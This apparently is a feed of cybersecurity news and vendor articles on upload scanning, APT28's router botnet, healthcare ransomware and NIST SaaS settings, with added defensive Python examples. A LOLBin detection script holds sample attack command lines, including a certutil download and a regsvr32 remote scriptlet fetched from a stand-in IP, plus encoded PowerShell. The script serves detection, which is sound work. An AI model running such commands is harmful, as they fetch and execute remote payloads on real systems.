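SAMPLE_EXE = b"MZ\x90\x00" + b"\x00" * 60

if __name__ == "__main__":
    for name, blob in [("photo.png", SAMPLE_PNG), ("photo.png", SAMPLE_PDF),
                       ("invoice.docx", SAMPLE_EXE), ("invoice.docx", SAMPLE_PLAIN_ZIP),
                       ("form.pdf", SAMPLE_PDF_JS), ("report.docx", SAMPLE_DOCX)]:
        print(name, validate_upload(name, blob))
```

The check rejects on mismatch rather than silently re-labelling the file: a PDF renamed photo.png is exactly the signal the text describes, and the reason string is what you would log and alert on before any engine scans the content.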

Proactive Data Loss Prevention: Reduce alert fatigue by redacting sensitive data

Proactive Data Loss Prevention (Proactive DLP)

OPSWAT’s Proactive Data Loss Prevention (DLP) module was developed specifically to address the growing concerns of compliance and regulation, data leakage and risks associated with file uploads. Our solution detects and protects sensitive information within various file types, including text, image, and video-based patterns.

Adaptive Sandbox: Adaptive threat analysis technology enables zero-day malware detection and extracts more indicators of compromise.

Real-Time Adaptive Sandbox

To overcome the limitations of traditional sandboxing, OPSWAT developed a unique emulation-based sandbox with adaptive threat analysis. By pairing it with our Multiscanning and Deep CDR technologies it provides a comprehensive multi-layered approach to malware detection and prevention. Our emulation-based approach can swiftly de-obfuscate and dissect even the most complex, state-of-the-art, and environment-aware malware in under 15 seconds.

What’s Next?

These are only some of the technologies that power the MetaDefender Platform. Like the modules detailed in this article, there are more that are purpose-built to meet the varied use-cases and needs of critical infrastructure protection. Like the threat landscape around us, we are driving innovation forward to step up and stay ahead of the latest threats.

We encourage you to read the whole whitepaper here, and when you’re ready to discover why OPSWAT is the critical advantage in file upload cybersecurity, talk to one of our experts for a free demo.

Cybersecurity Agencies Warn Ubiquiti EdgeRouter Users of APT28’s MooBot Threat (http://www.indiavpn.org/2024/02/28/cybersecurity-agencies-warn-ubiquiti-edgerouter-users-of-apt28s-moobot-threat/, published Wed, 28 Feb 2024 07:16:13 +0000)

Feb 28, 2024 | Newsroom | Firmware Security / Vulnerability

In a new joint advisory, cybersecurity and intelligence agencies from the U.S. and other countries are urging users of Ubiquiti EdgeRouter to take protective measures, weeks after a botnet comprising infected routers was felled by law enforcement as part of an operation codenamed Dying Ember.

The botnet, named MooBot, is said to have been used by a Russia-linked threat actor known as APT28 to facilitate covert cyber operations and drop custom malware for follow-on exploitation. APT28, affiliated with Russia’s Main Directorate of the General Staff (GRU), has been active since at least 2007.

APT28 actors have “used compromised EdgeRouters globally to harvest credentials, collect NTLMv2 digests, proxy network traffic, and host spear-phishing landing pages and custom tools,” the authorities said (PDF).

The adversary’s use of EdgeRouters dates back to 2022, with the attacks targeting aerospace and defense, education, energy and utilities, governments, hospitality, manufacturing, oil and gas, retail, technology, and transportation sectors in the Czech Republic, Italy, Lithuania, Jordan, Montenegro, Poland, Slovakia, Turkey, Ukraine, the U.A.E., and the U.S.


MooBot operators target routers with default or weak credentials and deploy trojanized OpenSSH binaries. APT28 then acquired this access to deliver bash scripts and other ELF binaries that collect credentials, proxy network traffic, host phishing pages, and run other tooling.

This includes Python scripts to upload account credentials belonging to specifically targeted webmail users, which are collected via cross-site scripting and browser-in-the-browser (BitB) spear-phishing campaigns.

APT28 has also been linked to the exploitation of CVE-2023-23397 (CVSS score: 9.8), a now-patched critical privilege escalation flaw in Microsoft Outlook that could enable the theft of NT LAN Manager (NTLM) hashes and mount a relay attack without requiring any user interaction.

Another tool in its malware arsenal is MASEPIE, a Python backdoor capable of executing arbitrary commands on victim machines utilizing compromised Ubiquiti EdgeRouters as command-and-control (C2) infrastructure.

“With root access to compromised Ubiquiti EdgeRouters, APT28 actors have unfettered access to Linux-based operating systems to install tooling and to obfuscate their identity while conducting malicious campaigns,” the agencies noted.


Organizations are recommended to perform a hardware factory reset of the routers to flush file systems of malicious files, upgrade to the latest firmware version, change default credentials, and implement firewall rules to prevent exposure of remote management services.

The revelations are a sign that nation-state hackers are increasingly using routers as a launchpad for attacks, using them to create botnets such as VPNFilter, Cyclops Blink, and KV-botnet and conduct their malicious activities.

The bulletin arrives a day after the Five Eyes nations called out APT29 – the threat group affiliated with Russia’s Foreign Intelligence Service (SVR) and the entity behind the attacks on SolarWinds, Microsoft, and HPE – for employing service accounts and dormant accounts to access cloud environments at target organizations.

Cybersecurity for Healthcare—Diagnosing the Threat Landscape and Prescribing Solutions for Recovery (http://www.indiavpn.org/2024/02/21/cybersecurity-for-healthcare-diagnosing-the-threat-landscape-and-prescribing-solutions-for-recovery/, published Wed, 21 Feb 2024 10:58:11 +0000)

On Thanksgiving Day 2023, while many Americans were celebrating, hospitals across the U.S. were doing quite the opposite. Systems were failing. Ambulances were diverted. Care was impaired. Hospitals in three states were hit by a ransomware attack, and in that moment, the real-world repercussions came to light—it wasn’t just computer networks that were brought to a halt, but actual patient care itself.

Cybercriminals are more brazen than ever, targeting smaller healthcare organizations for big payouts. Sure, it would be nice to believe thieves once lived by a code of conduct, but if one ever existed, it’s been torn to shreds and tossed into the wind. Sophisticated hacker groups are now more than happy to launch cyberattacks on medical clinics, nursing homes, and other health service providers. Small- to mid-sized healthcare organizations have, unfortunately, become vulnerable targets from which cybercriminals can easily steal sensitive data, extort heavy ransoms, and, worst of all, diminish critical patient care.

Ransomware and Phishing Attacks are Spreading at an Unhealthy Rate

If you work in healthcare, everything you do is important. That’s why the frequency with which healthcare organizations now come under attack is so concerning. According to the U.S. Department of Health and Human Services (HHS), there was a 93% increase in large breaches from 2018 to 2022. In that same period, breaches involving ransomware increased by 278%.

Ransomware doesn’t just hold your pocketbook hostage, but also your patients’ safety. At best, you’re locked out of your systems for a moment. At worst, patient care is radically compromised. This is especially alarming if you service smaller communities, where the local population relies on your clinic, cancer center, or physician’s office as the first and last lines of critical care.

Your patients are obviously your top priority, but you also have to consider the dollars at stake. The HIPAA Journal notes that in 2021, the average ransomware payment in the healthcare industry was $197,000. And that’s an increase of 33% from the prior year!

Phishing—fraudulent emails disguised as legitimate sources attempting to solicit personal information—is now the most popular means of attack. In fact, The HIPAA Journal cites that more than 90% of cyberattacks on healthcare organizations are phishing scams. That means carelessly clicking on one email can have dire consequences for your staff, your patients, and your operation.

Aside from the financial burden inflicted by cybercriminals, Health Insurance Portability and Accountability Act (HIPAA) fines can also be debilitating. If you fall prey to a data breach, you can be fined tens of thousands of dollars per violation. Case in point: a medical group in Louisiana recently paid $480,000 in the first settlement the HHS Office for Civil Rights has reached over a phishing attack. It all stemmed from a basic phishing scam in which a cybercriminal gained access to the medical group’s Microsoft 365 environment, where its patients’ protected health information (PHI) was stored.

More Endpoints and Fewer Resources Make Healthcare Easier Targets

Simply put, effective cybersecurity needs both advanced technology and human expertise. However, according to the report, The State of Cybersecurity for Mid-Sized Businesses in 2023, Huntress discovered over 60% of respondents didn’t have any dedicated cybersecurity experts on staff. That’s because many small- and mid-sized businesses (SMBs) are constrained, struggling to attain just one of these core components. Due to a variety of economic factors, SMBs—both within and beyond healthcare—have had to reduce budgets, which means foregoing much-needed investments in cybersecurity products and people.

According to the Healthcare Information and Management Systems Society (HIMSS), healthcare organizations typically spend less than 6% of their overall IT budgets on cybersecurity. Making matters worse, there’s a profound shortage of cybersecurity talent, so filling internal roles with qualified candidates has become a rising challenge. And with top talent being few and far between, the best candidates are commanding top-level salaries, which at times are out of reach for smaller healthcare organizations.

Aging tech isn’t helping matters either. Outdated equipment and legacy operating systems have become easy points of access for cybercriminals. Therefore, smaller healthcare organizations are ideal targets due to weaker defenses. With limited budgets and less manpower, your IT team may be stretched thin or may not possess the cybersecurity expertise to manage evolving cyber threats.

Adding to the chaos, there are more endpoints to protect than ever before. Over the past decade, and most notably throughout COVID, remote work and telehealth have grown significantly. The good news is that patients can now receive care from the comfort of their own homes, and providers like you can monitor and assist them from off-site. However, this level of care demands more avenues to access data, specifically via tablets, laptops, and mobile devices, which also means a larger attack surface through which unscrupulous actors can reach your data.

The Threat Landscape is Evolving, for the Worse

One reason threats are becoming more frequent is because cybercriminals are becoming more organized. And more ruthless. It’s no longer a mischievous loner in a dark basement, hunched over a monitor, hiding behind a black hoodie. These are sophisticated criminal entities that can carry out carefully choreographed heists. Imagine Ocean’s Eleven, but with less style and far less remorse.

U.S. intelligence has even uncovered hacking groups tied to hostile nations. Also known as advanced persistent threats (APTs), these state-sponsored cybercriminals have the means to debilitate everything from water-treatment plants to natural gas pipelines to electric grids. If these groups have grown powerful enough to take out military and civilian infrastructure, your small- to mid-sized healthcare organization is no challenge. For them, you’re just a drive-by ATM.

In the Huntress report, The State of Cybersecurity for Mid-Sized Businesses in 2023, it was revealed that nearly 25% of SMBs have either suffered a cyberattack or didn’t even realize they had suffered one in the past year.

Cybercriminals are now hiding in plain sight. They’ve advanced beyond standard ransomware tactics and are “blending into” your normal IT operations by abusing built-in system functionality. This makes it easier for them to take control of legitimate applications, such as remote monitoring and management (RMM) tools, to manipulate your systems. For instance, cybercriminals use living-off-the-land binaries (LOLBins), trusted executables pre-installed on your operating systems, for malicious ends. If threat actors no longer rely on custom malware, your standard spam filters or anti-malware solutions aren’t enough. You need visibility into what is actually executing across your environment.
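A detection sketch for the LOLBin abuse described above, added here as an example and not Huntress code. It scores process-creation events against a few well-known command-line patterns (a certutil -urlcache download, regsvr32 loading a remote scriptlet, mshta running inline script, PowerShell with an encoded command) and adds weight when an Office application is the parent process, which is how a phishing document typically launches these binaries. The event fields, rule weights and threshold are assumptions; the sample events are constructed and the 203.0.113.0/24 addresses are from the documentation range.

```python
import re

# Constructed process-creation events in the shape of a Sysmon/EDR feed.
# None come from a real incident; 203.0.113.0/24 is a documentation range.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r'"C:\Windows\System32\notepad.exe" C:\Users\nurse\notes.txt'},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://203.0.113.5/update.dat C:\Users\Public\update.dat"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -verify C:\temp\vendor.cer"},  # legitimate certutil use
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe javascript:close(new ActiveXObject("WScript.Shell").Run("calc.exe"))'},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s /n /u /i:http://203.0.113.5/payload.sct scrobj.dll"},
]

# (rule name, command-line pattern, weight). Weights are assumptions for illustration.
RULES = [
    ("certutil_download", r"\bcertutil(\.exe)?\b.*-urlcache", 80),
    ("certutil_decode", r"\bcertutil(\.exe)?\b.*-decode", 60),
    ("regsvr32_remote_scriptlet", r"\bregsvr32(\.exe)?\b.*/i:https?://", 90),
    ("mshta_inline_script", r"\bmshta(\.exe)?\b.*(javascript:|vbscript:)", 90),
    ("powershell_encoded_command", r"\bpowershell(\.exe)?\b.*(-enc\b|-encodedcommand\b)", 70),
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def score_event(event):
    """Return (score, matched rule names) for one process-creation event."""
    hits = [(name, weight) for name, pattern, weight in RULES
            if re.search(pattern, event["cmdline"], re.IGNORECASE)]
    parent = event["parent"].lower().rsplit("\\", 1)[-1]
    # A LOLBin launched by an Office document is far more suspicious than the
    # same binary run from an administrator's shell, so add weight for that.
    if hits and parent in OFFICE_PARENTS:
        hits.append(("office_parent", 30))
    return sum(weight for _, weight in hits), [name for name, _ in hits]


def detect(events, threshold=60):
    """Return (image, score, rule names) for events scoring at or above threshold."""
    alerts = []
    for event in events:
        score, names = score_event(event)
        if score >= threshold:
            alerts.append((event["image"], score, names))
    return alerts


if __name__ == "__main__":
    for image, score, names in detect(SAMPLE_EVENTS):
        print(f"{score:>4}  {image}  {', '.join(names)}")
```

The benign certutil -verify and the notepad launch score zero, which is the point: the binary name alone is never the signal, the combination of arguments and parent process is.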

You Can Take Action Now with a Few Solutions

When it comes to healthcare cybersecurity, there’s a lot on the line—including lives—so it’s important that organizations like yours are vigilant and proactive. Because no single layer of your security is completely safe anymore, you must adopt a defense-in-depth approach.

This entails creating layers to your defenses with solutions such as intrusion prevention, data encryption, threat detection, patch management, and more. So if a threat bypasses one of these countermeasures, there’s another layer to stop it from slipping through the cracks. A layered approach, however, likely requires ongoing monitoring and fine-tuning. If you happen to lack the in-house resources and expertise to manage your cybersecurity, rest assured there are a variety of simple solutions you can still implement to achieve effective protection, with one of the most potent being a managed EDR.

Security Awareness Training (SAT)

Introduce SAT to educate your staff on cybersecurity best practices. These programs can include phishing simulations and relevant cyber threat lessons that can guide them to make smarter decisions to keep your organization and your patients safe. When it comes to SAT programs, it’s advised you introduce engaging, story-driven lessons, as those are proven to be more effective for knowledge retention.

Multi-Factor Authentication (MFA)

MFA adds an extra layer of protection by requiring your staff to use a second verification factor, such as a personal phone or a security token, to gain access to an account. You’ve likely seen MFA used when logging into your banking app or even your go-to streaming service. The benefit of MFA is it goes beyond usernames and passwords, which can easily be lost, forgotten, or stolen.

Managed EDR

This can be the most powerful and cost-effective solution for your healthcare organization. By coupling advanced technology with human-led analysis, a managed EDR performs critical cybersecurity tasks on your behalf, namely:

  • Monitoring and collecting endpoint data
  • Detecting and investigating threats
  • Triaging alerts
  • Providing actionable remediation steps, including one-click solutions

Easy to deploy, Huntress Managed EDR is fully managed and monitored by a 24/7 Security Operations Center. These cybersecurity experts have your back from the first signs of suspicious activity all the way to remediation.

Huntress Safeguards Healthcare’s Cybersecurity Needs

As healthcare organizations sit in the crosshairs of cybercriminals, it’s absolutely vital you keep your defenses up. This is especially important in a world marked by ever-expanding threats and shrinking budgets.

Cybercriminals are now smarter, more coordinated, and definitely more unforgiving. They don’t care who they hurt, just so long as they can turn a quick profit. Therefore, it’s critical you bolster your cybersecurity in order to protect your organization, your staff, and your patients.

Building a thorough defense infrastructure, however, requires sizable capital, resources, and expertise. While smaller healthcare organizations can find it difficult to prioritize these, there are solutions. Evaluate potential risks. Educate your staff on cyber threats. And adopt a managed EDR. Just like in medicine, even the most basic preventive measures can stop the spread of something far more harmful.

Schedule a Trial Today

Huntress can help healthcare organizations like yours remain secure from ever-evolving cybersecurity threats. Schedule your free trial today.

Attending HIMSS 2024?

In Orlando, from March 11 to 15, you can visit Huntress in Booth 1616. Come learn more about how Huntress can help your healthcare organization thwart cyberattacks.

SaaS Compliance through the NIST Cybersecurity Framework (http://www.indiavpn.org/2024/02/20/saas-compliance-through-the-nist-cybersecurity-framework/, published Tue, 20 Feb 2024 19:54:16 +0000)

The US National Institute of Standards and Technology (NIST) cybersecurity framework is one of the world’s most important guidelines for securing networks. It can be applied to any number of applications, including SaaS.

One of the challenges facing those tasked with securing SaaS applications is the different settings found in each application. It makes it difficult to develop a configuration policy that will apply to an HR app that manages employees, a marketing app that manages content, and an R&D app that manages software versions, all while aligning with NIST compliance standards.

However, there are several settings that can be applied to nearly every app in the SaaS stack. In this article, we’ll explore some universal configurations, explain why they are important, and guide you in setting them in a way that improves your SaaS apps’ security posture.

Start with Admins

Role-based access control (RBAC) is a key to NIST adherence and should be applied to every SaaS app. There are two types of permissions within a SaaS application. Functional access covers things like creating accounts and navigating the application. Data access permissions, on the other hand, govern which users can retrieve and modify data. The admin account (or the super-admin account in some apps) is the most sensitive within the app, as it has full access to both types of permissions.

For threat actors, breaching an admin account is akin to winning the lottery. They have access to everything. Organizations must do everything within their power to maintain control over these accounts. This control is managed through configurations and best practices.

Implement Limited Redundancy

It’s important to have a minimum of two admins for every application. This redundancy makes it difficult for an admin to act alone against the best interests of the organization, as admins can monitor each other for any signs of a breach.

However, each admin increases the application’s attack surface. Organizations must strike a balance between having enough admins to adequately service the application while limiting exposure. An automated review of the number of admins should trigger alerts when the number of admins is outside the preferred range.

Eliminate External Admins

External admins introduce a new layer of uncertainty into SaaS security. Because they sit outside the organization, the security team can’t control the password policies or authentication tools that they use.

For example, should a threat actor try to log into your application and click Forgot Password, there is no way to know whether the threat actor can breach the external admin’s email account. That lack of oversight of external users could lead to a deep breach of your SaaS application, which is why NIST advises against having external admins. Depending on the application, either block external admins from getting admin privileges or identify external users with admin rights and remove those privileges.

For companies that hire an external IT company or outsource to an MSSP, those individuals should not be treated as external. The security team should still monitor for any other external users being granted admin permissions.

Require Admin MFA

To comply with NIST standards, all admin user accounts should be required to access the application using multi-factor authentication (MFA), such as a one-time password (OTP). MFA requires users to present a minimum of two forms of ID before it authenticates the user. A threat actor would need to compromise two authentication systems, increasing the level of difficulty of the compromise and reducing the risk to the account. Make sure to set MFA for admins as required (we also recommend MFA for all users, but it is a must-have for admins).
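The three admin controls above (a bounded number of admins, no external admins, MFA required for every admin) are the kind of check that should run automatically against each app’s user export. The following is an added example, not vendor code: it audits a constructed user list and reports each violation. The tenant domains, the contracted MSSP domain treated as internal, the admin head-count range and the sample users are all assumptions.

```python
ORG_DOMAINS = {"example.com"}            # assumed tenant domains
MSSP_DOMAINS = {"soc.mssp-example.net"}  # assumed contracted provider, treated as internal
ADMIN_ROLES = {"admin", "super_admin"}
ADMIN_RANGE = (2, 5)                     # assumed preferred number of admins

# Constructed user export in the shape most SaaS admin consoles provide.
USERS = [
    {"email": "alice@example.com", "role": "super_admin", "mfa_enrolled": True},
    {"email": "bob@example.com", "role": "admin", "mfa_enrolled": False},
    {"email": "contractor@partner-example.io", "role": "admin", "mfa_enrolled": True},
    {"email": "oncall@soc.mssp-example.net", "role": "admin", "mfa_enrolled": True},
    {"email": "carol@example.com", "role": "member", "mfa_enrolled": False},
    {"email": "dave@example.com", "role": "admin", "mfa_enrolled": True},
    {"email": "eve@example.com", "role": "admin", "mfa_enrolled": True},
]


def is_external(email, org_domains=ORG_DOMAINS, trusted=MSSP_DOMAINS):
    """External means outside the tenant's own domains and outside contracted providers."""
    domain = email.rsplit("@", 1)[-1].lower()
    return domain not in org_domains and domain not in trusted


def audit_admins(users, admin_range=ADMIN_RANGE):
    """Return a list of (finding, detail) tuples; an empty list means the app passes.

    Findings:
      admin_count_out_of_range  too few admins for redundancy, or too many exposed
      external_admin            admin whose domain the security team does not control
      admin_without_mfa         admin who can log in with a password alone
    """
    low, high = admin_range
    admins = [u for u in users if u["role"] in ADMIN_ROLES]
    findings = []
    if not low <= len(admins) <= high:
        findings.append(("admin_count_out_of_range",
                         f"{len(admins)} admins, expected {low}-{high}"))
    for admin in admins:
        if is_external(admin["email"]):
            findings.append(("external_admin", admin["email"]))
        if not admin["mfa_enrolled"]:
            findings.append(("admin_without_mfa", admin["email"]))
    return findings


if __name__ == "__main__":
    for finding, detail in audit_admins(USERS):
        print(f"{finding}: {detail}")
```

Run against the sample export this flags three things: six admins where at most five were wanted, the partner-domain admin, and bob, who holds admin rights without MFA. The MSSP on-call account passes because its domain is in the trusted set, which is the distinction the text draws for outsourced IT.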


Prevent Data Leaks

SaaS data leaks pose significant risks to organizations and their users, potentially compromising sensitive information stored within cloud-based applications. SaaS applications are marketed as collaboration tools. However, the configurations that enable users to work together can also compromise files and data. NIST, for its part, advocates monitoring the permissions of every resource.

A visible calendar can expose employees to socially engineered phishing attacks, while shared repositories can lead to a company’s internal source code being shared publicly. Email, files, and boards all contain sensitive data that should not be accessible to the public. While the following configurations are often called something different in each application, almost any app that stores content will have this type of control.

Stop Public Sharing

The difference between Share with All and Share with a User is profound. When items are shared with all, anyone with a link can access the materials. Share with a User, in contrast, adds an additional authentication mechanism, as the user needs to log in before accessing the material.

To reduce the content that is exposed, app admins should disable sharing over public URLs (“Anyone with the link”). In addition, some applications allow users to revoke access to URLs that have already been created. When available, organizations should be sure to toggle that setting to on.

Set Invitations to Expire

Many applications allow authorized users to invite external users to the application. However, most applications don’t implement an invite expiration date. In those circumstances, invites sent years prior can provide access to a threat actor who has just breached an external user’s email account. Enabling an auto-expiration date on invites eliminates that type of risk.

It’s worth noting that in some apps, configuration changes are retroactive, while others will only take effect moving forward.


Strengthening Passwords to Harden Application Security

Passwords are the first line of defense against unauthorized access. NIST advocates a strong and well-managed password policy, which is essential to protect sensitive user data, confidential business information, and proprietary assets stored within cloud-based infrastructure. Uniqueness, sufficient length, and screening against known-compromised values are the critical aspects of a robust password posture.

Passwords serve as a fundamental element in a layered security approach, complementing other security measures such as multi-factor authentication (MFA) and encryption. Compromised passwords can be a gateway for malicious actors to exploit vulnerabilities in the SaaS environment. The effective management of passwords enhances the overall resilience of SaaS systems, contributing to a more secure and trustworthy digital ecosystem for both businesses and their users.

Prevent Password Spray Attacks

In a password spray attack, threat actors try a handful of common passwords against many usernames, staying under lockout thresholds and hoping to get lucky on at least one account. Requiring MFA is the recommended way to blunt password spraying. For organizations that don’t insist on MFA as part of authentication, many apps allow a list of words to be banned as passwords. That list should include terms like password1, letmein, 12345, and the names of local sports teams, as well as the user’s name, company products, partners, and other business terms.

Going into the configurations and adding a custom banned words list can significantly reduce the risk of a successful password spray attack.

Password Complexity

Most SaaS applications allow the organization to customize password complexity. These range from allowing any password to requiring alphanumeric characters, capital and lowercase letters, symbols, or a password length. Update the password requirements in the app to match your organization’s policy.

If your organization doesn’t have a password policy, consider following NIST guidelines:

  1. Don’t mandate periodic password changes, as users then tend to choose easy-to-remember passwords.
  2. Prefer long passwords over complex ones. Combinations of numbers, special characters and lower/upper case characters usually follow a predictable format like this: Password1!. These are easy to brute force. A long password like MyFavoriteDessertIsPecanPie is easy to remember but, at 27 characters, difficult to brute force.
  3. Limit password attempts to no more than 10.
  4. Screen passwords against published passwords and other easy-to-guess words with a banned words list.
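A screening routine that applies the guidance above (length over composition rules, a banned-word list that also covers the user’s name and company terms, and a 10-attempt limit), as an added example that is not from the article or from any SaaS vendor; the banned terms, the stand-in published-password list and the sample users are constructed.

```python
"""Password screening and attempt limiting along the lines of the NIST
guidance above. Added example; the banned terms, the stand-in "published"
password list and the sample users are constructed, not real data."""
import re
import unicodedata
from dataclasses import dataclass, field

MIN_LENGTH = 12      # favor length over composition rules
MAX_ATTEMPTS = 10    # "limit password attempts to no more than 10"

# Constructed banned list of the kinds of terms the article names: common
# passwords, local sports teams, company products and partner names.
BANNED_TERMS = {
    "password1", "letmein", "12345", "qwerty", "welcome1",
    "tigers", "rangers",              # local sports teams (constructed)
    "acmecloud", "acmepay",           # company products (constructed)
    "widgetcorp",                     # partner name (constructed)
}
# Constructed stand-in for a list of published (breached) passwords.
PUBLISHED_PASSWORDS = {"summer2023", "iloveyou", "sunshine", "monkey123"}

# Substitutions users make to dodge banned words ("P@ssw0rd1!"); undone
# before screening so the variant is rejected along with the original.
_LEET = str.maketrans({"@": "a", "$": "s", "0": "o", "3": "e", "4": "a", "5": "s"})
_NON_ALNUM = re.compile(r"[\W_]+")


def _fold(text: str) -> str:
    """Case-fold, NFKC-normalize and drop punctuation for comparisons."""
    return _NON_ALNUM.sub("", unicodedata.normalize("NFKC", text).casefold())


def _candidate_forms(password: str) -> set[str]:
    """The forms of a password that are compared against the lists."""
    base = unicodedata.normalize("NFKC", password).casefold()
    return {base, _NON_ALNUM.sub("", base), _NON_ALNUM.sub("", base.translate(_LEET))}


def screen_password(password: str, *, username: str = "", context_terms=()) -> list[str]:
    """Return the reasons a candidate password fails; an empty list means accept.

    Banned and published entries are matched whole (after folding); context
    terms such as the user's name or a product name are rejected even when
    embedded in a longer password.
    """
    reasons = []
    if len(password) < MIN_LENGTH:
        reasons.append(f"shorter than {MIN_LENGTH} characters")
    forms = _candidate_forms(password)
    if forms & BANNED_TERMS:
        reasons.append("matches a banned term")
    if forms & PUBLISHED_PASSWORDS:
        reasons.append("appears in a published password list")
    for term in (username, *context_terms):
        folded = _fold(term)
        if len(folded) >= 4 and any(folded in form for form in forms):
            reasons.append(f"contains context term {term!r}")
    return reasons


@dataclass
class AttemptLimiter:
    """Per-account failed-attempt counter implementing the 10-attempt limit."""
    max_attempts: int = MAX_ATTEMPTS
    failures: dict = field(default_factory=dict)

    def allow_attempt(self, account: str) -> bool:
        return self.failures.get(account, 0) < self.max_attempts

    def record_failure(self, account: str) -> int:
        """Count one failed attempt and return how many remain before lockout."""
        self.failures[account] = self.failures.get(account, 0) + 1
        return max(self.max_attempts - self.failures[account], 0)

    def record_success(self, account: str) -> None:
        self.failures.pop(account, None)


if __name__ == "__main__":
    for pw in ("P@ssw0rd1!", "MyFavoriteDessertIsPecanPie", "AcmeCloudRocks2024"):
        verdict = screen_password(pw, username="jsmith", context_terms=["AcmeCloud"])
        print(pw, "->", verdict or "accepted")
```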

Configurations Really Matter

Approximately 25% of all cloud-related security incidents start with a misconfigured setting. In addition to those mentioned here relating to access, password, and data leaks, which are fairly universal, configurations are used for key management, mobile security, operational resilience, phishing protection, SPAM protection, and more. Misconfigurations in any of those areas can lead directly to breaches.

It may seem unlikely that threat actors spend their time looking for misconfigurations they can exploit. Yet that is exactly what the Russian state-sponsored group Midnight Blizzard did when it breached Microsoft this year. If misconfigurations can happen at Microsoft, it’s worth reviewing your own applications to make sure they are all secure.


Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter and LinkedIn to read more exclusive content we post.

Why We Must Democratize Cybersecurity (http://www.indiavpn.org/2024/02/16/why-we-must-democratize-cybersecurity/, Fri, 16 Feb 2024 12:36:42 +0000)

With breaches making the headlines on an almost weekly basis, the cybersecurity challenges we face are becoming visible not only to large enterprises, who have built security capabilities over the years, but also to small to medium businesses and the broader public. While this is creating greater awareness among smaller businesses of the need to improve their security posture, SMBs are often left facing a gap in the market, unable to find security tooling that is both easy for them to use and which they can afford.

When we consider the needs of SMBs, we need to focus both on the development of threat intelligence, which is necessary to understand and identify the threats being faced, as well as the tools used to provide protection. NTTSH has built a pedigree of over 20 years’ experience in the research and curation of threat intelligence as well as the development of capabilities and products which leverage its threat intelligence to protect customers. After many years of focus on larger enterprises, NTTSH is moving to democratize cybersecurity and provide smaller businesses with the protection they require.

Global Threat Intelligence Center

All of NTTSH’s efforts are underpinned by the capabilities of its Global Threat Intelligence Center (GTIC). The efforts of the GTIC go beyond those of a pure research organization by taking threat research and combining it with NTTSH proprietary detective technology to produce applied threat intelligence.

The GTIC’s mission is to protect clients by providing advanced threat research and security intelligence, enabling NTTSH to prevent, detect, and respond to cyber threats. To provide a truly unique vantage point within NTTSH’s products and services, GTIC leverages proprietary intelligence capabilities and NTT’s position as the operator of one of the world’s top 5 tier 1 Internet backbones, providing unequaled visibility of Internet telemetry to gain an understanding of and insight into the various threat actors, exploit tools and malware – and the tactics, techniques, and procedures used by attackers. In addition to curating its own threat intelligence research, GTIC also maintains relationships with other key players in this space, including the Cyber Threat Alliance, Microsoft, CISA, and the National Cyber Forensics and Training Alliance (NCFTA).

NTTSH’s annual Global Threat Intelligence Report (GTIR) provides a window into the work done by GTIC, providing a synopsis of the key challenges in the security landscape facing organizations of all sizes, together with actionable insights to help organizations better adapt to the evolving threat landscape. In the Q3 update of the 2023 GTIR, a special focus was placed on key industry verticals, providing insights into the threats they face.

Threat focus by sector

The healthcare sector faces a unique set of challenges, not only due to the high value of the information owned by healthcare providers but also as a result of steep growth in the adoption of technology in healthcare in a context where many providers, especially smaller ones, lack awareness of cybersecurity and also don’t have the resources to deploy and maintain the kinds of controls enjoyed by large enterprises. Ransomware is still proving particularly problematic. Healthcare ransomware breaches are proving to be particularly concentrated across a few geographies, with the USA, Australia, and the UK accounting for close to 80% of these breaches.

Figure 1: Ransomware victim locations in the Healthcare sector.

A similar geographic trend is visible in the telecommunications sector, where the USA, UK, and Australia account for roughly 52% of ransomware attacks, while in education, the USA, UK, and Canada account for approximately 83%.

Across all of the focus sectors, Lockbit 3.0 remains the most prolific ransomware threat actor. Some ransomware actors are, however, focusing on specific sectors, such as the Bl00dy ransomware gang, which specifically targets education.

Figure 2: Top ransomware actors in the telecommunications sector.

Security Challenges of SaaS

A recent area of focus for GTIC has been the way in which the rapidly accelerating adoption of SaaS is presenting its own set of challenges. SaaS is rapidly becoming an integral part of the day-to-day operations of both small and large businesses, with annual growth expected to continue at a rate of close to 20% through 2027. In this context, it is important to note that 99% of cloud security breaches are expected to be the customer’s fault, according to Gartner.

The shared responsibility model for cloud services is something larger enterprises have been familiar with for some time already. Smaller organizations, however, are still coming to grips with it. For SaaS, this means that while the cloud provider is responsible for the application, SMBs are still adapting to the fact that they retain responsibility for their data and, crucially, for managing their accounts and identities. Threat actors are, as a result, focusing on ways to compromise identities, especially using techniques such as credential stuffing and phishing.

Facing up to the Challenges of Hybrid IT

While SMBs were previously able to rely on antivirus software and firewalls to protect the technology assets on their premises, most have now moved into the world of hybrid IT as they increasingly rely on cloud-delivered services. While the security controls provided by most cloud services are good, SMBs face a variety of challenges in using the security functionality that is available to them.

As the attack surface of even smaller companies expands, the number of sources of security alerting grows. That is not the only challenge: threat actors will often not confine their activities to one part of your technology estate. They may start in one area, for instance, by compromising one or more endpoints (such as laptops) and then use the information they gather (such as credentials) to move laterally, for instance, to compromise a SaaS application. While large enterprises have spent the last 10 years or more building dedicated SecOps teams and intricate security toolchains, SMBs lack the resources for this kind of investment.

Democratizing Security Operations with XDR

